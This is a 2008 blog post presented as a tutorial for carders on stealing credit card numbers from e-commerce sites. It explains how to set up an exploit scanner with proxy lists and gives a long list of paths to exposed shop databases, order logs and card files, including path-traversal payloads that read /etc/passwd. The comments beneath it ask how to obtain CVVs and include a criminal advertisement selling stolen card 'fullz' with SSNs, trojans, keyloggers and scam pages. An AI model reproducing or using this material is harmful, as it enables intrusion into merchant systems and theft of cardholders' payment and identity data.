Friday, November 21, 2008

How To Hack Shop-Admin And Get Credit Card Numbers

As covered on the main site all information presented within this guide is for
information purposes only. any attempt to use the information within this guide
to commit anything illegal is solely the responsibility of the reader, and
neither i, information leak, nor anyone else affiliated is responsible for
what you do with the following information.


Section 1: the introduction
----------------------------

Originally i was working on a security scanner for ecommerce sites, but since i'm
about to get back into school and won't have as much time as before to really
work on many projects i decided it'd be better to just go ahead and write a
tutorial on the subject. so for this tutorial we will talk about one way a carder
would collect ccs to cash/use/sell/whatever, and that of course is exploiting
ecommerce sites. there are millions of sites out there used by businesses large
and small for peddling their services/merchandise, and needless to say there are
plenty of them out there that are easily exploited. so here it is, the answer to
every "how to hack cc" question out there. enjoy...


Section 2: database vulnerabilities
------------------------------------

One of the most common and easiest ways to exploit ecommerce sites is to use
database vulnerabilities. these are present due to insecure database software
that many ecommerce sites will use for recording and tracking online purchases.
one method that an attacker could use to find such database vulnerabilities on
a specific site is to use an exploiter. exploiters are software that will use
an exploit list to scan for exploits on a target web server, and report back
any positive responses. cmxploiter iv (content is disable for unregistered
register here)
is an example of an exploiter, though there are others that you can look for to
use as well. the interface for cmxploiter iv is pretty self-explanatory, but i'll
run you through the basics anyway. to use this tool you would first click "load",
which will bring up three different tabs. you would click "exploit lists" to
select an exploit list to use, "proxy list" is to of course select a list of
proxies to use, and "url list" is to select a list of targets to scan. then from
there you would go to options. the first menu to pop up is the current session
options. edit the responses to include in session history so that only the
"200 series responses" (positive responses) are included in the results, and from
here you can also edit the "socket timeout value" based on your internet connection
(leave as is for faster internet connections, set to 40 for slower internet
connections). then go to proxy list selection options and either put in the proxy
you are going to use for the scan, or click "multi-proxy mode" to tell cmxploiter iv
to use the proxy list you loaded. now that you have everything configured go
to start and select the type of scan you want to do. "single url scan" is used to
scan a single server with the exploit list provided, "multi-url scan" is used to
scan every site in the url list for every exploit in the exploit list, and
"single exploit scan" is used to scan every site in the url list for a single
exploit. on a last note with any exploiter you use if the option is available
be sute to set it to use get requests instead of head requests for the scan.
i've found that you get much more accurate results that way. now that i've
covered all the configurations i'm going to provide an exploit list that you
could use for scanning database vulnerabilities...


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$

/+comersus/database/comersus.mdb
/+comersus/store/comersus.mdb
/../../cart32.mdb
//comersus.mdb
//comersus/comersus.mdb
//comersus/database/comersus.mdb
//database/comersus.mdb
//shop/
//shop/?m=a
//store/
//store/?m=a
//store/comersus.mdb
//store/comersus/comersus.mdb
//store/comersus/database/comersus.mdb
//store/database/comersus.mdb
/asp/cart/
/asp/cart/database/
/asp/cart/database/metacart.mdb
/bin/cart.pl
/bin/cartmanager.cgi
/cgi-bin/cart.pl
/cgi-bin/cartmanager.cgi
/cgi/cartmanager.cgi
/cybercash/smps*.../merchants/admin.pw
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dcshop/dcshop_admin.cgi
/dcshop/orders/orders.txt
/midicart/midicart.mdb
/merchant2/
/merchant2/install.txt
/merchant2/admin.mv
/merchant2/database/
/merchant2/modules/
/orders
/orders/
/orders/
/orders/order.log
/orders/order_log.dat
/orders/order_log_v12.dat
/orders/orders.txt
/oscommerce/catalog/
/oscommerce/catalog/admin/
/oscommerce/catalog/admin/orders.php
/osecommerce/
/osecommerce/admin/
/osecommerce/admin/admin/
/osecommerce/admin/admin/includes/
/osecommerce/admin/admin/includes/functions/
/osecommerce/admin/admin/includes/functions/databa se.php
/pdg/cvv2.txt
/pdg/order.txt
/pdg_cart
/pdg_cart/
/pdg_cart/authorizenet.txt
/pdg_cart/authorizenets.txt
/pdg_cart/cc.txt
/pdg_cart/oder.log
/pdg_cart/order.log
/pdg_cart/shopper.conf
/pdg_cart/shopper.config
/ptsc/db/ptsc.mdb
/procuctcart/pc/pcadmin/
/prodctcart/pcadmin/
/productcart/database/eipc.mdb
/productcart/pc/admin
/sales_files/
/shop/shop.sql
/shop/info.dat
/shop/orders.in
/shop/track.db
/shopcart2.mdb
/shoppingcart/cart.jsp
/shoppingcart/orders.inc
/siteserver/admin/
/siteserver/admin/commerce/foundation/dsn.asp
/siteserver/admin/commerce/foundation/domain.asp
/siteserver/admin/commerce/foundation/driver.asp
/siteserver/admin/knowledge/dsmgr/default.asp
/siteserver/admin/knowledge/dsmgr/users/groupmanag er.asp
/siteserver/admin/knowledge/dsmgr/users/usermanage r.asp
/siteserver/admin/knowledge/persmbr/vslslprd.asp
/siteserver/admin/knowledge/persmbr/vsprauoed.asp
/siteserver/admin/knowledge/persmbr/vstmpr.asp
/siteserver/admin/knowledge/persmbr/vs.asp
/siteserver/knowledge/default.asp?ctr=\">
/siteserver/publishing/
/siteserver/publishing/viewcode.asp
/siteserver/publishing/viewcode.asp
/siteserver/admin/
/siteserver/admin/findvserver.asp
/siteserver/admin/findvserver.asp?uid=ldap_anonymo us&pwd=ldappassword_1
/store/admin/default.asp
/store/orders.inc
/storeadmin
/storeadmin/
/storedb
/storedb/
/webshop
/webshop/
/webshop/logs/
/webshop/logs/cc.txt
/webshop/logs/ck.log
/webshop/templates/cc.txt
/web_store
/web_store/web_store.cgi?page=../../../../../../../ ../../../etc/passwd.html
/web_store
/web_store/
/web_store/admin_files/
/web_store/web_store.cgi?page=../../../../../../../ ../etc/passw
/webshop*
/webshop/
/webshop/*
/webstore/
/_database/shopping400.mdb
/_private/shopping_cart.mdb
/_vti_cnf/order.log
/_vti_cnf/order.txt
/acart.mdb
/acart2.mdb
/acart20.mdb
/acart2_0.mdb
/acart2_0/acart2_0.mdb
/acart2_0/admin/category.asp /acart2_0/admin/error.asp?msg=
/acart2_0/admin/index.asp?msg=
/acart2_0/deliver.asp?msg=

5 comments:

kings said...

bro after exploiting what will you do next.....can you please be a little clear

kings said...

after exploiting what else you do to get the cvv

Love Blackhat said...

CC Shop Admin http://bit.ly/UR4G6U

Anonymous said...

chrome +x *
----> Anonymous Tools seller <----
Hello world i will be great full with all of readers Ethical hacking tools for sale
Also Teach How To Make Money Via Tools....
PHISHING SPAM TOOLS for credit card or bank spam
CARDING TOOLS for make cash via stolen cards
VIRUS for some one exploit complity free your victum cash
PRIVET SCANEERS for get hacking tools or become a tools seller
---> Privet Tools prize list <---
CREDIT CARD FULLZ ANY COUNTRY :50$ per one <-----come with Dob + SSN + MMN + Driving license
PREPAID RANDOM CARD ANY COUNTRY :10$ per one
SMTP :->> 10$ for ip (4$ for Domain)
SHELL :->> 10$$ per one
CPANEL :->> 15$ per one
SCAM PAGE BULLTPROOF:->> 50$ for simple (60$ for undetectable)
RDP :->> 25$ any country
PHP MAILER :->> 20$ per one
SOCKS :->> 35$$ any country
RDP :->> 7$ any country
HMA :->> 30$ unlimited 12 month
VIP72 :->> 150$ unlimited 6 month
CARD Validator :->> 30$ (for fixing un-valide card number and bin checker)
WU BUG :->>200$
ZEUS TORJON :->> 200$ (with fud crypted jpg,pdf or doc file)
KEY LOGER :->> 150$ (for email,pm and btc logs)
NINJA RAT :->> 130$ (with fud crypted jpeg,pdf or doc file)
CIDITAL STEALER :->> 150$ (with fud crypted jpeg,pdf or doc file)
SSH Brute Force SCANEER :->> 200$ (windows based),(ssh roots or required for run)
SMTP SCANEER :->> 350$ (linux bassed),(ssh/root required for run )
RDP SCANEER :->> 250$ (linux bassed),(ssh/root required for run)
SMTP+RDP multi SCANEER :->> 300$ (linux bassed),(ssh/root required for run)
CPANEL SCANEER :->> 300$ (linux bassed),(ssh/root+10 cpanel or shell required for run)
ROOT SCANEER :->> 300$ (linux bassed),(ssh/root required for run)
--------> Contact us <---------
SKYPE: rushr00t000
HANG OUT: hackitbackd00r@gmail.com
YAHOO IMI: hackitbackdoor@yahoo.com
FREE ARTICALS OR TOOLS: https://hackingleakeds.blogspot.com/2017/03/how-to-make-money-via-hacking-tools.html

Anonymous said...
This comment has been removed by the author.